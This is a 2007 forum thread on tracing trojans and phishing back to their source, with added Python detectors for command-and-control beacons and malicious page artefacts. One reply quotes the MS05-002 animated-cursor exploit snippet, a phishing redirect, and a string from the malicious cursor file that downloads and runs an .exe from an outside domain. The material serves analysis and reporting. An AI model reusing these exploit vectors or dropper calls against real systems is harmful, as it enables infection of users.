can a trojan be traced back to its sender
H2O_Lover
March 5th, 2007, 12:22 AM
Does anyone know if a trojan virus can be traced back to its sender? I know where I got it and how, but I would love to prove it. It was put in a pop-up window that asked me for my password. My virus protection caught it and I wrote down all the stuff; others were not as lucky. I would love to send the information needed to stop this person.
Thanks ahead of time.
Paranoid2000
March 5th, 2007, 05:41 AM
Possibly - if you have extensive malware and disassembly skills you may be able to look at a trojan's code and see similarities with other known malware. If the author(s) are real amateurs, they may include personal data like email addresses (as noted here (http://www.f-secure.com/weblog/archives/archive-022007.html#00001122)) but anyone stupid enough to do that has likely ripped off someone else's code, not written their own.
Another option is to let a trojan run and find out what it does and where it connects to. Most trojans use IRC (though the latest are now using P2P for communication) so they need to connect to a central server (normally one that has been broken into). Some groups (e.g. Shadowserver (http://www.shadowserver.org/)) specialise in tracking down and terminating such control centres. One (old) account of this type of tracking can be found at The Attacks on GRC.COM (http://www.grc.com/dos/grcdos.htm).
In summary, it's only feasible for those with extensive technical expertise. If you lack such, then you are more likely to infect your system.
However, in your case, it may not even be a trojan but instead a webpage exploit (what did your AV identify it as?) that caused the popup. If this occurred on a legitimate site, contact the owner to let them know (if no contact details are given, use a site like DNSStuff (www.dnsstuff.com) or NWTools (www.nwtools.com) to look up the domain details - these should normally give an email address). However, if your AV detected it, there is likely little more that you can do.
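Paranoid2000's second route, letting a sample run in a controlled environment and seeing where it connects, comes down to reading the connection log afterwards. The Python below is an added example written for this thread, not code from any of the posts. It parses a few constructed firewall-style log lines (documentation IP ranges, made-up timestamps; the log format itself is an assumption) and reports destinations that use IRC ports or that the infected host contacts at a steady interval, which is how the central server that a trojan reports to tends to stand out from ordinary browsing.

```python
import re
from collections import defaultdict
from datetime import datetime
from statistics import median

# Ports commonly used by IRC servers, the usual control channel for the
# trojans Paranoid2000 describes.
IRC_PORTS = {6660, 6661, 6662, 6663, 6664, 6665, 6666, 6667, 6668, 6669, 6697, 7000}

# Constructed sample log ("timestamp proto src -> dst flags"), not real data
# from the thread. 203.0.113.5 plays the part of the control server.
SAMPLE_LOG = """\
2007-03-05 00:20:01 TCP 192.168.1.10:1041 -> 198.51.100.7:80 SYN
2007-03-05 00:20:03 TCP 192.168.1.10:1042 -> 203.0.113.5:6667 SYN
2007-03-05 00:20:09 TCP 192.168.1.10:1043 -> 198.51.100.7:80 SYN
2007-03-05 00:21:03 TCP 192.168.1.10:1044 -> 203.0.113.5:6667 SYN
2007-03-05 00:22:03 TCP 192.168.1.10:1045 -> 203.0.113.5:6667 SYN
2007-03-05 00:22:40 TCP 192.168.1.10:1046 -> 192.0.2.9:443 SYN
2007-03-05 00:23:03 TCP 192.168.1.10:1047 -> 203.0.113.5:6667 SYN
2007-03-05 00:24:03 TCP 192.168.1.10:1048 -> 203.0.113.5:6667 SYN
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<proto>TCP|UDP) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+)"
)


def parse_connections(text):
    """Turn log lines into dicts; lines that do not match the format are skipped."""
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d = m.groupdict()
            d["dport"] = int(d["dport"])
            d["ts"] = datetime.strptime(d["ts"], "%Y-%m-%d %H:%M:%S")
            conns.append(d)
    return conns


def find_c2_candidates(text, min_contacts=3):
    """Group outbound connections by destination and flag the suspicious ones.

    A destination is reported when it listens on an IRC port, or when the host
    contacts it at least min_contacts times at a steady interval (a beacon).
    """
    by_dst = defaultdict(list)
    for c in parse_connections(text):
        by_dst[(c["dst"], c["dport"])].append(c["ts"])

    findings = []
    for (dst, port), times in by_dst.items():
        times.sort()
        reasons = []
        if port in IRC_PORTS:
            reasons.append("irc-port")
        if len(times) >= min_contacts:
            gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
            mid = median(gaps)
            # "steady" means every gap lies within 10% of the median gap
            if mid > 0 and all(abs(g - mid) <= 0.1 * mid for g in gaps):
                reasons.append(f"beacon~{int(mid)}s")
        if reasons:
            findings.append({"dst": dst, "port": port,
                             "count": len(times), "reasons": reasons})

    # most reasons first, then most contacts
    findings.sort(key=lambda f: (-len(f["reasons"]), -f["count"]))
    return findings


if __name__ == "__main__":
    for f in find_c2_candidates(SAMPLE_LOG):
        print(f"{f['dst']}:{f['port']} contacted {f['count']}x -> {', '.join(f['reasons'])}")
```

On the sample, only 203.0.113.5:6667 is reported (IRC port plus a 60-second beacon); the web and HTTPS destinations are left alone. The beacon test is deliberately strict so that a busy site visited twice does not trip it, which is why the threshold and the 10% tolerance are parameters rather than fixed numbers.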
H2O_Lover
March 5th, 2007, 08:53 AM
This is all the info I have; the X's are where my name was:
file: p[1].htm
Trojan name: JS/Exploit-BO.gen
file path: C:\Documents and Settings\xxxxxxxxxxxx\Local Settings\Temporary Internet Files\Content.IE5\OLM3MR87
I do know exactly where I got it. It was from a 3rd party who set up a chat room for investors using the software LiVve.
Maybe there is something in the host site. I would think something should show this somewhere.
Again, thanks for the help.
Paranoid2000
March 5th, 2007, 05:34 PM
It's an old one then, according to Network Associates' Information Page (http://vil.nai.com/vil/content/v_130621.htm). If you still get the warning, inform the chatroom host. Otherwise it could have been posted by a visitor or a spam/IRCbot.
Rmus
March 5th, 2007, 07:35 PM
To follow up on what Paranoid2000 suggested about analysis -
1) you can analyze phish emails and report them. This is fun, and perhaps you can help stop the phish. While phish sites are not normally dangerous by just visiting them, a "click" on the site could trigger a trojan download, so you should have something in place to prevent remote code execution.
I received this a few days ago:
http://www.urs2.net/rsj/computing/tests/paypal/email.gif
Looks like a phish. Launching to the site:
http://www.urs2.net/rsj/computing/tests/paypal/site.gif
Note that hovering over the "Click Here" reveals that the URL is not PayPal. Clicking on it does bring up a PayPal site, but notice that the URL is different. Hmm... must be a redirect:
http://www.urs2.net/rsj/computing/tests/paypal/site2.gif
Going directly to the site - it seemed to be a legitimate site; perhaps it had been hacked to upload this page. I sent her an email and noticed that the file was removed shortly after that. I sent the other URL to shadowserver's efraud. Not a trojan, in this case.
Looking in the /~ellensohn directory of the URL contained in the email reveals the "start.html" file which contains code which redirects:
<meta http-equiv="Refresh" content="0; URL=http://www.[removed]/file/.www.paypal.com/webscr.php?cmd=_login-run">
The link no longer works. Note that the "start.html" file, instead of being a redirect, could have triggered a download via iframe or other such exploits. So, just looking at that URL in the email, you can't tell what is going to happen.
2) Letting an exploit run. Here, as P2K cautions, you have to have protection in place.
Last year, a trojan hijacker was found launched from several sites. I went to one using Opera, and nothing happened. Looking at the source code showed it to be the old animated cursor exploit (MS05-002),
<style>
* {CURSOR: url("./exp_2/1.ani");}
</style>
so I had to fire up IE (unpatched) to get it to run. Since the .ani file is doing the work while it shows in the status bar, the user doesn't see any reference to the .exe file which is attempting to download in the background:
http://www.urs2.net/rsj/computing/imgs/remotecode2.gif
Both the .ani file and .exe file had already been identified by AV:
http://www.urs2.net/rsj/computing/imgs/remotecode-scan2.gif
http://www.urs2.net/rsj/computing/imgs/remotecode-scan.gif
Looking inside the animated cursor file (1.ani) to see how the download worked:
urlmon.dll_URLDownloadToFileA_WinExec_http://kunsthandel-scheider.de/daten/dlle.exe
That web site seemed to be a legitimate site of an art collector. As above, I sent an email to the site, but heard nothing. I contacted Kevin McAleavey at nsclean.com, who sent an email in German. He also heard nothing back. We reported the site, but checking today, I see that the trojan file is still on the site. So, efforts don't always pay off, but it's still worth tracing back to the sender just in case.
regards,
-rich
________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier
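Rich's two walk-throughs are hand inspection: hover over the link to compare the shown host with the real one, open start.html and spot the meta refresh, read the page source for a cursor rule pulling in a .ani file, and run strings over the cursor file to find the download API names and the URL. The Python below is an added example for this thread, not rich's own tooling, that does those four checks over constructed samples shaped like the ones he describes (the hostnames, paths and the fake .ani bytes are made up; the only real names are the Windows API imports being looked for). It reads files, never fetches anything, so it is safe to run over a saved mail or a page grabbed with a non-rendering download.

```python
import re
from urllib.parse import urlparse

# Constructed samples modelled on the post, not the real files rich examined.
PHISH_EMAIL_HTML = """<p>Your account has been limited.
<a href="http://198.51.100.7/~someuser/start.html">
https://www.paypal.com/cgi-bin/webscr</a> to restore access.</p>"""

START_HTML = """<html><head>
<meta http-equiv="Refresh" content="0; URL=http://203.0.113.9/file/.www.paypal.com/webscr.php?cmd=_login-run">
</head><body></body></html>"""

CURSOR_PAGE_HTML = """<html><head><style>
* {CURSOR: url("./exp_2/1.ani");}
</style></head><body>Welcome</body></html>"""

# A fake cursor file: RIFF/ACON header, binary padding, then the kind of
# strings rich found inside 1.ani (constructed; documentation IP address).
FAKE_ANI = (b"RIFF\x00\x10\x00\x00ACON" + b"\x90" * 40
            + b"urlmon.dll\x00URLDownloadToFileA\x00WinExec\x00"
            + b"http://203.0.113.9/daten/dropper.exe\x00" + b"\x00" * 20)

META_REFRESH_RE = re.compile(
    r'<meta[^>]*http-equiv\s*=\s*["\']?refresh["\']?[^>]*content\s*=\s*["\']([^"\']+)["\']',
    re.IGNORECASE)
CURSOR_URL_RE = re.compile(r'cursor\s*:\s*url\(\s*["\']?([^"\')]+)["\']?\s*\)', re.IGNORECASE)
ANCHOR_RE = re.compile(r'<a\b[^>]*href\s*=\s*["\']([^"\']+)["\'][^>]*>(.*?)</a>',
                       re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r'https?://[^\s<>"\']+', re.IGNORECASE)
# Import names a cursor or icon file has no business containing.
DOWNLOAD_APIS = ("URLDownloadToFileA", "URLDownloadToFileW", "WinExec",
                 "ShellExecuteA", "CreateProcessA")


def find_link_mismatches(html):
    """Anchors whose visible text shows one host while href points at another."""
    mismatches = []
    for href, text in ANCHOR_RE.findall(html):
        real_host = urlparse(href).hostname
        for shown in URL_RE.findall(text):
            shown_host = urlparse(shown).hostname
            if shown_host and real_host and shown_host != real_host:
                mismatches.append((shown_host, real_host))
    return mismatches


def find_meta_refresh(html):
    """Targets of <meta http-equiv="Refresh"> redirects, as in start.html."""
    targets = []
    for content in META_REFRESH_RE.findall(html):
        m = re.search(r'url\s*=\s*(\S+)', content, re.IGNORECASE)
        if m:
            targets.append(m.group(1))
    return targets


def find_cursor_resources(html):
    """Files pulled in through CSS cursor: url(...), the MS05-002 vector."""
    return CURSOR_URL_RE.findall(html)


def printable_strings(data, min_len=6):
    """ASCII runs of at least min_len bytes, like the Unix strings tool."""
    return [s.decode("ascii") for s in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def inspect_binary(data):
    """Download APIs and URLs embedded in a file that should contain neither."""
    strings = printable_strings(data)
    apis = [api for api in DOWNLOAD_APIS if api in strings]
    urls = [s for s in strings if URL_RE.match(s)]
    return {"apis": apis, "urls": urls}


if __name__ == "__main__":
    print("link mismatches:", find_link_mismatches(PHISH_EMAIL_HTML))
    print("meta refresh   :", find_meta_refresh(START_HTML))
    print("cursor files   :", find_cursor_resources(CURSOR_PAGE_HTML))
    print("inside .ani    :", inspect_binary(FAKE_ANI))
```

The URL and host found by inspect_binary and find_meta_refresh are exactly what you would pass along to the site owner or to a reporting service, which is the point rich makes at the end: whether or not the host answers, the trace gives you something concrete to report.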